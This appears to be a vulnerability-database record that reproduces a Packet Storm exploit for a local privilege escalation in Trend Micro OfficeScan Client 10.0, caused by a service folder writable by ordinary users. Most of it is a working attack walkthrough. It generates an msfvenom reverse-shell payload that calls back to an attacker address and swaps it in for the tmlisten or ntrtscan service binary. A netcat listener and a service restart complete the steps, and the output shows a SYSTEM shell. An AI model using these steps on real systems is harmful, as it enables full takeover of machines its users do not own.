ID

VAR-E-202305-0084


TITLE

Trend Micro OfficeScan Client 10.0 Local Privilege Escalation

Trust: 0.5

sources: PACKETSTORM: 172513

DESCRIPTION

Trend Micro OfficeScan Client version 10.0 suffers from an ACL service related local privilege escalation vulnerability.

Trust: 0.5

sources: PACKETSTORM: 172513

AFFECTED PRODUCTS

vendor:trend micromodel:officescan clientscope:eqversion:10.0

Trust: 0.5

sources: PACKETSTORM: 172513

EXPLOIT

# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE
# Date: 2023/05/04
# Exploit Author: msd0pe
# Vendor Homepage: https://www.trendmicro.com
# My Github: https://github.com/msd0pe-1

Trend Micro OfficeScan Client:
Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.

[1] Verify the folder rights:
> icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
NT SERVICE\TrustedInstaller:(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
CREATOR OWNER:(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)

[2] Get informations about the services:
> sc qc tmlisten

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: tmlisten
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OfficeScan NT Listener
DEPENDENCIES : Netman
: WinMgmt
SERVICE_START_NAME : LocalSystem

OR

> sc qc ntrtscan

SERVICE_NAME: ntrtscan
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OfficeScan NT RealTime Scan
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe

OR

> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe

[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe

[5] Start listener
> nc -lvp 4444

[6] Reboot the service/server
> sc stop tmlisten
> sc start tmlisten

OR

> sc stop ntrtscan
> sc start ntrtscan

OR

> shutdown /r

[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

nt authority\system

Trust: 0.5

sources: PACKETSTORM: 172513

EXPLOIT HASH

LOCAL

SOURCE

md5: f7fbf95b65052d7e4ee38eaea21107f4
sha-1: fd581a83ed2456957b2c75572a6c43471a1396d0
sha-256: 5586052ddea883443fe0930aa1c130b975e1449e028a541a6718e573b19c887a
sha-256: 5586052ddea883443fe0930aa1c130b975e1449e028a541a6718e573b19c887a

Trust: 0.5

sources: PACKETSTORM: 172513

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 172513

TAGS

tag:exploit

Trust: 0.5

tag:local

Trust: 0.5

sources: PACKETSTORM: 172513

CREDITS

msd0pe

Trust: 0.5

sources: PACKETSTORM: 172513

EXTERNAL IDS

db:PACKETSTORMid:172513

Trust: 0.5

sources: PACKETSTORM: 172513

SOURCES

db:PACKETSTORMid:172513

LAST UPDATE DATE

2023-12-13T13:18:36.949000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:172513date:2023-05-24T14:49:54